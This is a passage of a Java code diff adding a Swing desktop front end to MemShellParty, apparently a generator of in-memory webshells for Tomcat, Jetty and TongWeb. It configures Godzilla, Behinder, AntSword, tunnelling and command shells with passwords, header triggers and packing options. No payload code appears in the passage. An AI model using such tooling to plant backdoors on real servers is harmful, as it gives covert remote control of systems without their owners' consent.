private final boolean jarOutput;
|
||||
private final boolean agentOutput;
|
||||
|
||||
public DesktopMemShellGenerateResult(MemShellResult memShellResult, String packMethod, String packResult) {
|
||||
this.memShellResult = memShellResult;
|
||||
this.packMethod = packMethod;
|
||||
this.packResult = packResult;
|
||||
this.jarOutput = packMethod != null && packMethod.endsWith("Jar");
|
||||
this.agentOutput = packMethod != null && packMethod.startsWith("Agent");
|
||||
}
|
||||
|
||||
public MemShellResult getMemShellResult() { return memShellResult; }
|
||||
public String getPackMethod() { return packMethod; }
|
||||
public String getPackResult() { return packResult; }
|
||||
public boolean isJarOutput() { return jarOutput; }
|
||||
public boolean isAgentOutput() { return agentOutput; }
|
||||
}
|
||||
+145
@@ -0,0 +1,145 @@
|
||||
package com.reajason.javaweb.desktop.memshell.model;
|
||||
|
||||
import java.util.LinkedHashMap;
|
||||
import java.util.Map;
|
||||
|
||||
public class MemShellFormState {
|
||||
private String server = "Tomcat";
|
||||
private String serverVersion = "Unknown";
|
||||
private String targetJdkVersion = "50";
|
||||
private boolean debug;
|
||||
private boolean byPassJavaModule;
|
||||
private boolean probe;
|
||||
private boolean lambdaSuffix;
|
||||
private boolean shrink = true;
|
||||
private boolean staticInitialize = true;
|
||||
|
||||
private String shellTool = "Godzilla";
|
||||
private String shellType = "Listener";
|
||||
private String urlPattern = "/*";
|
||||
|
||||
private String shellClassName = "";
|
||||
private String injectorClassName = "";
|
||||
|
||||
private String godzillaPass = "";
|
||||
private String godzillaKey = "";
|
||||
private String behinderPass = "";
|
||||
private String antSwordPass = "";
|
||||
private String commandParamName = "";
|
||||
private String commandTemplate = "";
|
||||
private String headerName = "User-Agent";
|
||||
private String headerValue = "";
|
||||
private String shellClassBase64 = "";
|
||||
private String encryptor = "";
|
||||
private String implementationClass = "";
|
||||
|
||||
private String packingMethod = "";
|
||||
private final Map<String, Object> packerCustomConfig = new LinkedHashMap<>();
|
||||
|
||||
private boolean randomClassName = true;
|
||||
private String customInputMode = "base64";
|
||||
|
||||
private String savedShellClassName = "";
|
||||
private String savedInjectorClassName = "";
|
||||
|
||||
public MemShellFormState copy() {
|
||||
MemShellFormState c = new MemShellFormState();
|
||||
c.server = server;
|
||||
c.serverVersion = serverVersion;
|
||||
c.targetJdkVersion = targetJdkVersion;
|
||||
c.debug = debug;
|
||||
c.byPassJavaModule = byPassJavaModule;
|
||||
c.probe = probe;
|
||||
c.lambdaSuffix = lambdaSuffix;
|
||||
c.shrink = shrink;
|
||||
c.staticInitialize = staticInitialize;
|
||||
c.shellTool = shellTool;
|
||||
c.shellType = shellType;
|
||||
c.urlPattern = urlPattern;
|
||||
c.shellClassName = shellClassName;
|
||||
c.injectorClassName = injectorClassName;
|
||||
c.godzillaPass = godzillaPass;
|
||||
c.godzillaKey = godzillaKey;
|
||||
c.behinderPass = behinderPass;
|
||||
c.antSwordPass = antSwordPass;
|
||||
c.commandParamName = commandParamName;
|
||||
c.commandTemplate = commandTemplate;
|
||||
c.headerName = headerName;
|
||||
c.headerValue = headerValue;
|
||||
c.shellClassBase64 = shellClassBase64;
|
||||
c.encryptor = encryptor;
|
||||
c.implementationClass = implementationClass;
|
||||
c.packingMethod = packingMethod;
|
||||
c.packerCustomConfig.putAll(packerCustomConfig);
|
||||
c.randomClassName = randomClassName;
|
||||
c.customInputMode = customInputMode;
|
||||
c.savedShellClassName = savedShellClassName;
|
||||
c.savedInjectorClassName = savedInjectorClassName;
|
||||
return c;
|
||||
}
|
||||
|
||||
public Map<String, Object> getPackerCustomConfig() { return packerCustomConfig; }
|
||||
|
||||
public String getServer() { return server; }
|
||||
public void setServer(String server) { this.server = server; }
|
||||
public String getServerVersion() { return serverVersion; }
|
||||
public void setServerVersion(String serverVersion) { this.serverVersion = serverVersion; }
|
||||
public String getTargetJdkVersion() { return targetJdkVersion; }
|
||||
public void setTargetJdkVersion(String targetJdkVersion) { this.targetJdkVersion = targetJdkVersion; }
|
||||
public boolean isDebug() { return debug; }
|
||||
public void setDebug(boolean debug) { this.debug = debug; }
|
||||
public boolean isByPassJavaModule() { return byPassJavaModule; }
|
||||
public void setByPassJavaModule(boolean byPassJavaModule) { this.byPassJavaModule = byPassJavaModule; }
|
||||
public boolean isProbe() { return probe; }
|
||||
public void setProbe(boolean probe) { this.probe = probe; }
|
||||
public boolean isLambdaSuffix() { return lambdaSuffix; }
|
||||
public void setLambdaSuffix(boolean lambdaSuffix) { this.lambdaSuffix = lambdaSuffix; }
|
||||
public boolean isShrink() { return shrink; }
|
||||
public void setShrink(boolean shrink) { this.shrink = shrink; }
|
||||
public boolean isStaticInitialize() { return staticInitialize; }
|
||||
public void setStaticInitialize(boolean staticInitialize) { this.staticInitialize = staticInitialize; }
|
||||
public String getShellTool() { return shellTool; }
|
||||
public void setShellTool(String shellTool) { this.shellTool = shellTool; }
|
||||
public String getShellType() { return shellType; }
|
||||
public void setShellType(String shellType) { this.shellType = shellType; }
|
||||
public String getUrlPattern() { return urlPattern; }
|
||||
public void setUrlPattern(String urlPattern) { this.urlPattern = urlPattern; }
|
||||
public String getShellClassName() { return shellClassName; }
|
||||
public void setShellClassName(String shellClassName) { this.shellClassName = shellClassName == null ? "" : shellClassName; }
|
||||
public String getInjectorClassName() { return injectorClassName; }
|
||||
public void setInjectorClassName(String injectorClassName) { this.injectorClassName = injectorClassName == null ? "" : injectorClassName; }
|
||||
public String getGodzillaPass() { return godzillaPass; }
|
||||
public void setGodzillaPass(String godzillaPass) { this.godzillaPass = nv(godzillaPass); }
|
||||
public String getGodzillaKey() { return godzillaKey; }
|
||||
public void setGodzillaKey(String godzillaKey) { this.godzillaKey = nv(godzillaKey); }
|
||||
public String getBehinderPass() { return behinderPass; }
|
||||
public void setBehinderPass(String behinderPass) { this.behinderPass = nv(behinderPass); }
|
||||
public String getAntSwordPass() { return antSwordPass; }
|
||||
public void setAntSwordPass(String antSwordPass) { this.antSwordPass = nv(antSwordPass); }
|
||||
public String getCommandParamName() { return commandParamName; }
|
||||
public void setCommandParamName(String commandParamName) { this.commandParamName = nv(commandParamName); }
|
||||
public String getCommandTemplate() { return commandTemplate; }
|
||||
public void setCommandTemplate(String commandTemplate) { this.commandTemplate = nv(commandTemplate); }
|
||||
public String getHeaderName() { return headerName; }
|
||||
public void setHeaderName(String headerName) { this.headerName = nv(headerName); }
|
||||
public String getHeaderValue() { return headerValue; }
|
||||
public void setHeaderValue(String headerValue) { this.headerValue = nv(headerValue); }
|
||||
public String getShellClassBase64() { return shellClassBase64; }
|
||||
public void setShellClassBase64(String shellClassBase64) { this.shellClassBase64 = nv(shellClassBase64); }
|
||||
public String getEncryptor() { return encryptor; }
|
||||
public void setEncryptor(String encryptor) { this.encryptor = nv(encryptor); }
|
||||
public String getImplementationClass() { return implementationClass; }
|
||||
public void setImplementationClass(String implementationClass) { this.implementationClass = nv(implementationClass); }
|
||||
public String getPackingMethod() { return packingMethod; }
|
||||
public void setPackingMethod(String packingMethod) { this.packingMethod = nv(packingMethod); }
|
||||
public boolean isRandomClassName() { return randomClassName; }
|
||||
public void setRandomClassName(boolean randomClassName) { this.randomClassName = randomClassName; }
|
||||
public String getCustomInputMode() { return customInputMode; }
|
||||
public void setCustomInputMode(String customInputMode) { this.customInputMode = nv(customInputMode); }
|
||||
public String getSavedShellClassName() { return savedShellClassName; }
|
||||
public void setSavedShellClassName(String savedShellClassName) { this.savedShellClassName = nv(savedShellClassName); }
|
||||
public String getSavedInjectorClassName() { return savedInjectorClassName; }
|
||||
public void setSavedInjectorClassName(String savedInjectorClassName) { this.savedInjectorClassName = nv(savedInjectorClassName); }
|
||||
|
||||
private static String nv(String v) { return v == null ? "" : v; }
|
||||
}
|
||||
+15
@@ -0,0 +1,15 @@
|
||||
package com.reajason.javaweb.desktop.memshell.model;
|
||||
|
||||
import java.util.ArrayList;
|
||||
import java.util.List;
|
||||
|
||||
public class PackerCategoryModel {
|
||||
private String name;
|
||||
private final List<PackerEntryModel> packers = new ArrayList<>();
|
||||
|
||||
public PackerCategoryModel() {}
|
||||
public PackerCategoryModel(String name) { this.name = name; }
|
||||
public String getName() { return name; }
|
||||
public void setName(String name) { this.name = name; }
|
||||
public List<PackerEntryModel> getPackers() { return packers; }
|
||||
}
|
||||
+30
@@ -0,0 +1,30 @@
|
||||
package com.reajason.javaweb.desktop.memshell.model;
|
||||
|
||||
import java.util.ArrayList;
|
||||
import java.util.LinkedHashMap;
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
|
||||
public class PackerEntryModel {
|
||||
private String categoryName;
|
||||
private String name;
|
||||
private String outputKind;
|
||||
private boolean categoryAnchor;
|
||||
private final List<PackerSchemaFieldModel> fields = new ArrayList<>();
|
||||
private final Map<String, Object> defaultConfig = new LinkedHashMap<>();
|
||||
|
||||
public String getCategoryName() { return categoryName; }
|
||||
public void setCategoryName(String categoryName) { this.categoryName = categoryName; }
|
||||
public String getName() { return name; }
|
||||
public void setName(String name) { this.name = name; }
|
||||
public String getOutputKind() { return outputKind; }
|
||||
public void setOutputKind(String outputKind) { this.outputKind = outputKind; }
|
||||
public boolean isCategoryAnchor() { return categoryAnchor; }
|
||||
public void setCategoryAnchor(boolean categoryAnchor) { this.categoryAnchor = categoryAnchor; }
|
||||
public List<PackerSchemaFieldModel> getFields() { return fields; }
|
||||
public Map<String, Object> getDefaultConfig() { return defaultConfig; }
|
||||
|
||||
public String displayLabel() {
|
||||
return categoryName == null || categoryName.equals(name) ? name : categoryName + " / " + name;
|
||||
}
|
||||
}
|
||||
+43
@@ -0,0 +1,43 @@
|
||||
package com.reajason.javaweb.desktop.memshell.model;
|
||||
|
||||
import java.util.ArrayList;
|
||||
import java.util.List;
|
||||
|
||||
public class PackerSchemaFieldModel {
|
||||
public static class Option {
|
||||
private String value;
|
||||
private String label;
|
||||
|
||||
public Option() {}
|
||||
public Option(String value, String label) {
|
||||
this.value = value;
|
||||
this.label = label;
|
||||
}
|
||||
public String getValue() { return value; }
|
||||
public void setValue(String value) { this.value = value; }
|
||||
public String getLabel() { return label; }
|
||||
public void setLabel(String label) { this.label = label; }
|
||||
}
|
||||
|
||||
private String key;
|
||||
private String type;
|
||||
private boolean required;
|
||||
private Object defaultValue;
|
||||
private String description;
|
||||
private String descriptionI18nKey;
|
||||
private final List<Option> options = new ArrayList<>();
|
||||
|
||||
public String getKey() { return key; }
|
||||
public void setKey(String key) { this.key = key; }
|
||||
public String getType() { return type; }
|
||||
public void setType(String type) { this.type = type; }
|
||||
public boolean isRequired() { return required; }
|
||||
public void setRequired(boolean required) { this.required = required; }
|
||||
public Object getDefaultValue() { return defaultValue; }
|
||||
public void setDefaultValue(Object defaultValue) { this.defaultValue = defaultValue; }
|
||||
public String getDescription() { return description; }
|
||||
public void setDescription(String description) { this.description = description; }
|
||||
public String getDescriptionI18nKey() { return descriptionI18nKey; }
|
||||
public void setDescriptionI18nKey(String descriptionI18nKey) { this.descriptionI18nKey = descriptionI18nKey; }
|
||||
public List<Option> getOptions() { return options; }
|
||||
}
|
||||
+127
@@ -0,0 +1,127 @@
|
||||
package com.reajason.javaweb.desktop.memshell.service;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.model.PackerCategoryModel;
|
||||
import com.reajason.javaweb.desktop.memshell.model.PackerEntryModel;
|
||||
import com.reajason.javaweb.desktop.memshell.model.PackerSchemaFieldModel;
|
||||
import com.reajason.javaweb.memshell.ServerFactory;
|
||||
import com.reajason.javaweb.memshell.config.CommandConfig;
|
||||
import com.reajason.javaweb.memshell.server.AbstractServer;
|
||||
import com.reajason.javaweb.packer.Packers;
|
||||
import com.reajason.javaweb.packer.spec.PackerFieldSchema;
|
||||
import com.reajason.javaweb.packer.spec.PackerOptionValue;
|
||||
import com.reajason.javaweb.packer.spec.PackerSchema;
|
||||
|
||||
import java.util.*;
|
||||
import java.util.stream.Collectors;
|
||||
|
||||
public class ConfigCatalogService {
|
||||
|
||||
public static class ConfigCatalog {
|
||||
private final Map<String, List<String>> servers;
|
||||
private final Map<String, Map<String, List<String>>> core;
|
||||
private final List<PackerCategoryModel> packers;
|
||||
private final List<String> commandEncryptors;
|
||||
private final List<String> commandImplementationClasses;
|
||||
|
||||
public ConfigCatalog(Map<String, List<String>> servers,
|
||||
Map<String, Map<String, List<String>>> core,
|
||||
List<PackerCategoryModel> packers,
|
||||
List<String> commandEncryptors,
|
||||
List<String> commandImplementationClasses) {
|
||||
this.servers = servers;
|
||||
this.core = core;
|
||||
this.packers = packers;
|
||||
this.commandEncryptors = commandEncryptors;
|
||||
this.commandImplementationClasses = commandImplementationClasses;
|
||||
}
|
||||
|
||||
public Map<String, List<String>> getServers() { return servers; }
|
||||
public Map<String, Map<String, List<String>>> getCore() { return core; }
|
||||
public List<PackerCategoryModel> getPackers() { return packers; }
|
||||
public List<String> getCommandEncryptors() { return commandEncryptors; }
|
||||
public List<String> getCommandImplementationClasses() { return commandImplementationClasses; }
|
||||
}
|
||||
|
||||
public ConfigCatalog load() {
|
||||
Map<String, List<String>> servers = new LinkedHashMap<>();
|
||||
Map<String, Map<String, List<String>>> core = new LinkedHashMap<>();
|
||||
|
||||
for (String serverName : ServerFactory.getSupportedServers()) {
|
||||
AbstractServer server = ServerFactory.getServer(serverName);
|
||||
if (server == null) {
|
||||
continue;
|
||||
}
|
||||
List<String> shellTypes = new ArrayList<>(server.getShellInjectorMapping().getSupportedShellTypes());
|
||||
servers.put(serverName, shellTypes);
|
||||
|
||||
Map<String, List<String>> toolMap = new LinkedHashMap<>();
|
||||
for (String tool : server.getSupportedShellTools()) {
|
||||
List<String> types = new ArrayList<>(server.getSupportedShellTypes(tool));
|
||||
if (!types.isEmpty()) {
|
||||
toolMap.put(tool, types);
|
||||
}
|
||||
}
|
||||
core.put(serverName, toolMap);
|
||||
}
|
||||
|
||||
List<PackerCategoryModel> packerModels = new ArrayList<>();
|
||||
for (Map.Entry<String, List<Packers>> entry : Packers.groupedPackers().entrySet()) {
|
||||
PackerCategoryModel category = new PackerCategoryModel(entry.getKey());
|
||||
for (Packers packerEnum : entry.getValue()) {
|
||||
PackerEntryModel p = new PackerEntryModel();
|
||||
p.setCategoryName(entry.getKey());
|
||||
p.setName(packerEnum.name());
|
||||
p.setOutputKind(packerEnum.getOutputKind());
|
||||
p.setCategoryAnchor(packerEnum.hasChildren());
|
||||
PackerSchema schema = packerEnum.getSchema();
|
||||
if (schema != null) {
|
||||
p.getDefaultConfig().putAll(schema.getDefaultConfig());
|
||||
for (PackerFieldSchema field : schema.getFields()) {
|
||||
PackerSchemaFieldModel f = new PackerSchemaFieldModel();
|
||||
f.setKey(field.getKey());
|
||||
f.setType(field.getType() == null ? null : field.getType().name());
|
||||
f.setRequired(field.isRequired());
|
||||
f.setDefaultValue(field.getDefaultValue());
|
||||
f.setDescription(field.getDescription());
|
||||
f.setDescriptionI18nKey(field.getDescriptionI18nKey());
|
||||
for (PackerOptionValue option : field.getOptions()) {
|
||||
f.getOptions().add(new PackerSchemaFieldModel.Option(option.getValue(), option.getLabel()));
|
||||
}
|
||||
p.getFields().add(f);
|
||||
}
|
||||
}
|
||||
category.getPackers().add(p);
|
||||
}
|
||||
packerModels.add(category);
|
||||
}
|
||||
|
||||
List<String> encryptors = Arrays.stream(CommandConfig.Encryptor.values()).map(Enum::name).collect(Collectors.toList());
|
||||
List<String> impls = Arrays.stream(CommandConfig.ImplementationClass.values()).map(Enum::name).collect(Collectors.toList());
|
||||
|
||||
return new ConfigCatalog(servers, core, packerModels, encryptors, impls);
|
||||
}
|
||||
|
||||
public List<String> getServerVersionOptions(String server) {
|
||||
if ("TongWeb".equals(server)) {
|
||||
return Arrays.asList("6", "7", "8");
|
||||
}
|
||||
if ("Jetty".equals(server)) {
|
||||
return Arrays.asList("6", "7+", "12");
|
||||
}
|
||||
return Collections.singletonList("Unknown");
|
||||
}
|
||||
|
||||
public List<String> getTargetJdkOptions() {
|
||||
return Arrays.asList("50", "52", "53", "55", "61", "65");
|
||||
}
|
||||
|
||||
public String getTargetJdkLabel(String value) {
|
||||
if ("50".equals(value)) return "Java6";
|
||||
if ("52".equals(value)) return "Java8";
|
||||
if ("53".equals(value)) return "Java9";
|
||||
if ("55".equals(value)) return "Java11";
|
||||
if ("61".equals(value)) return "Java17";
|
||||
if ("65".equals(value)) return "Java21";
|
||||
return value;
|
||||
}
|
||||
}
|
||||
+22
@@ -0,0 +1,22 @@
|
||||
package com.reajason.javaweb.desktop.memshell.service;
|
||||
|
||||
import net.bytebuddy.jar.asm.ClassReader;
|
||||
|
||||
import java.util.Base64;
|
||||
|
||||
public class CustomClassNameParser {
|
||||
public String parseClassNameFromBase64(String classBase64) {
|
||||
if (classBase64 == null || classBase64.trim().isEmpty()) {
|
||||
throw new IllegalArgumentException("class base64 is empty");
|
||||
}
|
||||
byte[] bytes = Base64.getDecoder().decode(classBase64);
|
||||
return parseClassName(bytes);
|
||||
}
|
||||
|
||||
public String parseClassName(byte[] classBytes) {
|
||||
if (classBytes == null || classBytes.length == 0) {
|
||||
throw new IllegalArgumentException("class bytes are empty");
|
||||
}
|
||||
return new ClassReader(classBytes).getClassName().replace('/', '.');
|
||||
}
|
||||
}
|
||||
+147
@@ -0,0 +1,147 @@
|
||||
package com.reajason.javaweb.desktop.memshell.service;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.model.DesktopMemShellGenerateResult;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
import com.reajason.javaweb.memshell.MemShellGenerator;
|
||||
import com.reajason.javaweb.memshell.MemShellResult;
|
||||
import com.reajason.javaweb.memshell.ShellTool;
|
||||
import com.reajason.javaweb.memshell.config.*;
|
||||
import com.reajason.javaweb.packer.ClassPackerConfig;
|
||||
import com.reajason.javaweb.packer.JarPacker;
|
||||
import com.reajason.javaweb.packer.Packer;
|
||||
import com.reajason.javaweb.packer.Packers;
|
||||
|
||||
import java.util.Base64;
|
||||
import java.util.LinkedHashMap;
|
||||
import java.util.Map;
|
||||
|
||||
public class GenerationService {
|
||||
|
||||
public DesktopMemShellGenerateResult generate(MemShellFormState s) {
|
||||
ShellConfig shellConfig = ShellConfig.builder()
|
||||
.server(s.getServer())
|
||||
.serverVersion(s.getServerVersion())
|
||||
.shellTool(s.getShellTool())
|
||||
.shellType(s.getShellType())
|
||||
.targetJreVersion(parseInt(s.getTargetJdkVersion(), 50))
|
||||
.debug(s.isDebug())
|
||||
.byPassJavaModule(s.isByPassJavaModule())
|
||||
.probe(s.isProbe())
|
||||
.shrink(s.isShrink())
|
||||
.lambdaSuffix(s.isLambdaSuffix())
|
||||
.build();
|
||||
|
||||
InjectorConfig injectorConfig = InjectorConfig.builder()
|
||||
.urlPattern(blankToDefault(s.getUrlPattern(), "/*"))
|
||||
.injectorClassName(blankToNull(s.getInjectorClassName()))
|
||||
.staticInitialize(s.isStaticInitialize())
|
||||
.build();
|
||||
|
||||
ShellToolConfig shellToolConfig = buildShellToolConfig(s);
|
||||
MemShellResult memShellResult = MemShellGenerator.generate(shellConfig, injectorConfig, shellToolConfig);
|
||||
|
||||
String packMethod = s.getPackingMethod();
|
||||
Packers packers = Packers.fromName(packMethod);
|
||||
Packer<?> packer = packers.getInstance();
|
||||
String packResult;
|
||||
if (packer instanceof JarPacker) {
|
||||
JarPacker jarPacker = (JarPacker) packer;
|
||||
packResult = Base64.getEncoder().encodeToString(jarPacker.packBytes(memShellResult.toJarPackerConfig()));
|
||||
} else {
|
||||
ClassPackerConfig<Object> classPackerConfig = cast(memShellResult.toClassPackerConfig());
|
||||
Map<String, Object> rawCustom = new LinkedHashMap<>(s.getPackerCustomConfig());
|
||||
classPackerConfig.setCustomConfig(((Packer<Object>) packer).resolveCustomConfig(rawCustom));
|
||||
packResult = ((Packer<Object>) packer).pack(classPackerConfig);
|
||||
}
|
||||
return new DesktopMemShellGenerateResult(memShellResult, packMethod, packResult);
|
||||
}
|
||||
|
||||
@SuppressWarnings("unchecked")
|
||||
private static ClassPackerConfig<Object> cast(ClassPackerConfig<?> c) {
|
||||
return (ClassPackerConfig<Object>) c;
|
||||
}
|
||||
|
||||
private ShellToolConfig buildShellToolConfig(MemShellFormState s) {
|
||||
String tool = s.getShellTool();
|
||||
if (ShellTool.Godzilla.equals(tool)) {
|
||||
return GodzillaConfig.builder()
|
||||
.shellClassName(blankToNull(s.getShellClassName()))
|
||||
.pass(blankToNull(s.getGodzillaPass()))
|
||||
.key(blankToNull(s.getGodzillaKey()))
|
||||
.headerName(blankToNull(s.getHeaderName()))
|
||||
.headerValue(blankToNull(s.getHeaderValue()))
|
||||
.build();
|
||||
}
|
||||
if (ShellTool.Behinder.equals(tool)) {
|
||||
return BehinderConfig.builder()
|
||||
.shellClassName(blankToNull(s.getShellClassName()))
|
||||
.pass(blankToNull(s.getBehinderPass()))
|
||||
.headerName(blankToNull(s.getHeaderName()))
|
||||
.headerValue(blankToNull(s.getHeaderValue()))
|
||||
.build();
|
||||
}
|
||||
if (ShellTool.AntSword.equals(tool)) {
|
||||
return AntSwordConfig.builder()
|
||||
.shellClassName(blankToNull(s.getShellClassName()))
|
||||
.pass(blankToNull(s.getAntSwordPass()))
|
||||
.headerName(blankToNull(s.getHeaderName()))
|
||||
.headerValue(blankToNull(s.getHeaderValue()))
|
||||
.build();
|
||||
}
|
||||
if (ShellTool.Suo5.equals(tool) || ShellTool.Suo5v2.equals(tool)) {
|
||||
return Suo5Config.builder()
|
||||
.shellClassName(blankToNull(s.getShellClassName()))
|
||||
.headerName(blankToNull(s.getHeaderName()))
|
||||
.headerValue(blankToNull(s.getHeaderValue()))
|
||||
.build();
|
||||
}
|
||||
if (ShellTool.NeoreGeorg.equals(tool)) {
|
||||
return NeoreGeorgConfig.builder()
|
||||
.shellClassName(blankToNull(s.getShellClassName()))
|
||||
.headerName(blankToNull(s.getHeaderName()))
|
||||
.headerValue(blankToNull(s.getHeaderValue()))
|
||||
.build();
|
||||
}
|
||||
if (ShellTool.Proxy.equals(tool)) {
|
||||
return ProxyConfig.builder()
|
||||
.shellClassName(blankToNull(s.getShellClassName()))
|
||||
.headerName(blankToNull(s.getHeaderName()))
|
||||
.headerValue(blankToNull(s.getHeaderValue()))
|
||||
.build();
|
||||
}
|
||||
if (ShellTool.Custom.equals(tool)) {
|
||||
return CustomConfig.builder()
|
||||
.shellClassName(blankToNull(s.getShellClassName()))
|
||||
.shellClassBase64(blankToNull(s.getShellClassBase64()))
|
||||
.build();
|
||||
}
|
||||
if (ShellTool.Command.equals(tool)) {
|
||||
return CommandConfig.builder()
|
||||
.shellClassName(blankToNull(s.getShellClassName()))
|
||||
.paramName(blankToNull(s.getCommandParamName()))
|
||||
.headerName(blankToNull(s.getHeaderName()))
|
||||
.headerValue(blankToNull(s.getHeaderValue()))
|
||||
.template(blankToNull(s.getCommandTemplate()))
|
||||
.encryptor(CommandConfig.Encryptor.fromString(blankToNull(s.getEncryptor())))
|
||||
.implementationClass(CommandConfig.ImplementationClass.fromString(blankToNull(s.getImplementationClass())))
|
||||
.build();
|
||||
}
|
||||
throw new IllegalArgumentException("Unsupported shell tool: " + tool);
|
||||
}
|
||||
|
||||
private int parseInt(String value, int defaultValue) {
|
||||
try {
|
||||
return Integer.parseInt(value);
|
||||
} catch (Exception ignored) {
|
||||
return defaultValue;
|
||||
}
|
||||
}
|
||||
|
||||
private static String blankToNull(String s) {
|
||||
return s == null || s.trim().isEmpty() ? null : s;
|
||||
}
|
||||
|
||||
private static String blankToDefault(String s, String d) {
|
||||
return s == null || s.trim().isEmpty() ? d : s;
|
||||
}
|
||||
}
|
||||
+138
@@ -0,0 +1,138 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.DesktopMemShellGenerateResult;
|
||||
import com.reajason.javaweb.desktop.memshell.service.ConfigCatalogService;
|
||||
import com.reajason.javaweb.desktop.memshell.service.CustomClassNameParser;
|
||||
import com.reajason.javaweb.desktop.memshell.service.GenerationService;
|
||||
import com.reajason.javaweb.desktop.memshell.ui.panel.MainConfigPanel;
|
||||
import com.reajason.javaweb.desktop.memshell.ui.panel.PackageConfigPanel;
|
||||
import com.reajason.javaweb.desktop.memshell.ui.panel.ResultPanel;
|
||||
import com.reajason.javaweb.desktop.memshell.util.SwingUiUtil;
|
||||
import com.reajason.javaweb.desktop.memshell.validation.MemShellValidator;
|
||||
import net.miginfocom.swing.MigLayout;
|
||||
|
||||
import javax.swing.*;
|
||||
import java.awt.*;
|
||||
|
||||
public class MemShellGeneratorFrame extends JFrame {
|
||||
private final MemShellFormController controller;
|
||||
private final GenerationService generationService;
|
||||
private final MainConfigPanel mainConfigPanel;
|
||||
private final PackageConfigPanel packageConfigPanel;
|
||||
private final ResultPanel resultPanel;
|
||||
private final JButton generateButton = new JButton("生成内存马");
|
||||
private final JLabel statusLabel = new JLabel("就绪");
|
||||
private JComponent mainContentPanel;
|
||||
|
||||
public MemShellGeneratorFrame() {
|
||||
super("MemShellParty - MemShellGenerator");
|
||||
this.controller = new MemShellFormController(new ConfigCatalogService(), new MemShellValidator());
|
||||
this.generationService = new GenerationService();
|
||||
CustomClassNameParser customClassNameParser = new CustomClassNameParser();
|
||||
|
||||
this.resultPanel = new ResultPanel();
|
||||
this.mainConfigPanel = new MainConfigPanel(controller, customClassNameParser, this::refreshAll);
|
||||
this.packageConfigPanel = new PackageConfigPanel(controller, this::refreshAll);
|
||||
|
||||
setDefaultCloseOperation(WindowConstants.EXIT_ON_CLOSE);
|
||||
setMinimumSize(new Dimension(1180, 900));
|
||||
setSize(1280, 900);
|
||||
setLocationRelativeTo(null);
|
||||
|
||||
setLayout(new BorderLayout(6, 6));
|
||||
add(buildToolbar(), BorderLayout.NORTH);
|
||||
add(buildContent(), BorderLayout.CENTER);
|
||||
add(buildStatusBar(), BorderLayout.SOUTH);
|
||||
|
||||
generateButton.addActionListener(e -> onGenerate());
|
||||
resultPanel.clear();
|
||||
refreshAll();
|
||||
}
|
||||
|
||||
private JComponent buildToolbar() {
|
||||
JPanel p = new JPanel(new BorderLayout());
|
||||
p.setBorder(BorderFactory.createEmptyBorder(4, 8, 2, 8));
|
||||
return p;
|
||||
}
|
||||
|
||||
private JComponent buildContent() {
|
||||
JPanel topPane = new JPanel(new MigLayout("insets 0, fillx, wrap 1", "[grow,fill]", "[][]"));
|
||||
JPanel leftColumn = new JPanel(new MigLayout("insets 0, fillx, wrap 1", "[grow,fill]", "[]6[]"));
|
||||
leftColumn.add(mainConfigPanel.getCorePanelComponent(), "growx");
|
||||
leftColumn.add(packageConfigPanel, "growx");
|
||||
|
||||
JPanel rightColumn = new JPanel(new MigLayout("insets 0, fillx, wrap 1", "[grow,fill]", "[]"));
|
||||
rightColumn.add(mainConfigPanel.getToolPanelComponent(), "growx");
|
||||
|
||||
JPanel topColumns = new JPanel(new MigLayout("insets 0, fillx, aligny top, gapx 8, wrap 2",
|
||||
"[grow,fill,sg topCol][grow,fill,sg topCol]",
|
||||
"[top]"));
|
||||
topColumns.add(leftColumn, "growx, pushx, top");
|
||||
topColumns.add(rightColumn, "growx, pushx, top");
|
||||
topPane.add(topColumns, "growx, pushy");
|
||||
|
||||
topPane.add(generateButton, "wrap, growx, gaptop 10");
|
||||
generateButton.setFont(generateButton.getFont().deriveFont(Font.BOLD, 14f));
|
||||
|
||||
JPanel content = new JPanel(new MigLayout("insets 0, fill, wrap 1", "[grow,fill]", "[][grow,fill]"));
|
||||
content.add(topPane, "growx");
|
||||
content.add(resultPanel, "grow, push");
|
||||
mainContentPanel = content;
|
||||
return content;
|
||||
}
|
||||
|
||||
private JComponent buildStatusBar() {
|
||||
JPanel p = new JPanel(new BorderLayout());
|
||||
p.setBorder(BorderFactory.createEmptyBorder(3, 8, 3, 8));
|
||||
p.add(statusLabel, BorderLayout.WEST);
|
||||
return p;
|
||||
}
|
||||
|
||||
private void onGenerate() {
|
||||
com.reajason.javaweb.desktop.memshell.validation.MemShellValidator.Result validation = controller.validate();
|
||||
if (!validation.isValid()) {
|
||||
statusLabel.setText("校验失败");
|
||||
SwingUiUtil.showError(this, validation.firstMessage());
|
||||
return;
|
||||
}
|
||||
generateButton.setEnabled(false);
|
||||
statusLabel.setText("生成中...");
|
||||
|
||||
SwingWorker<DesktopMemShellGenerateResult, Void> worker = new SwingWorker<DesktopMemShellGenerateResult, Void>() {
|
||||
@Override
|
||||
protected DesktopMemShellGenerateResult doInBackground() {
|
||||
return generationService.generate(controller.getState().copy());
|
||||
}
|
||||
|
||||
@Override
|
||||
protected void done() {
|
||||
generateButton.setEnabled(true);
|
||||
try {
|
||||
DesktopMemShellGenerateResult result = get();
|
||||
resultPanel.showResult(result);
|
||||
statusLabel.setText("生成成功");
|
||||
} catch (Exception ex) {
|
||||
statusLabel.setText("生成失败");
|
||||
SwingUiUtil.showError(MemShellGeneratorFrame.this, "生成失败: " + (ex.getCause() != null ? ex.getCause().getMessage() : ex.getMessage()));
|
||||
}
|
||||
}
|
||||
};
|
||||
worker.execute();
|
||||
}
|
||||
|
||||
public void refreshAll() {
|
||||
mainConfigPanel.refreshFromController();
|
||||
packageConfigPanel.refreshFromController();
|
||||
repaint();
|
||||
revalidate();
|
||||
}
|
||||
|
||||
JComponent getMainContentPanel() {
|
||||
return mainContentPanel;
|
||||
}
|
||||
|
||||
JButton getGenerateButton() {
|
||||
return generateButton;
|
||||
}
|
||||
}
|
||||
+169
@@ -0,0 +1,169 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
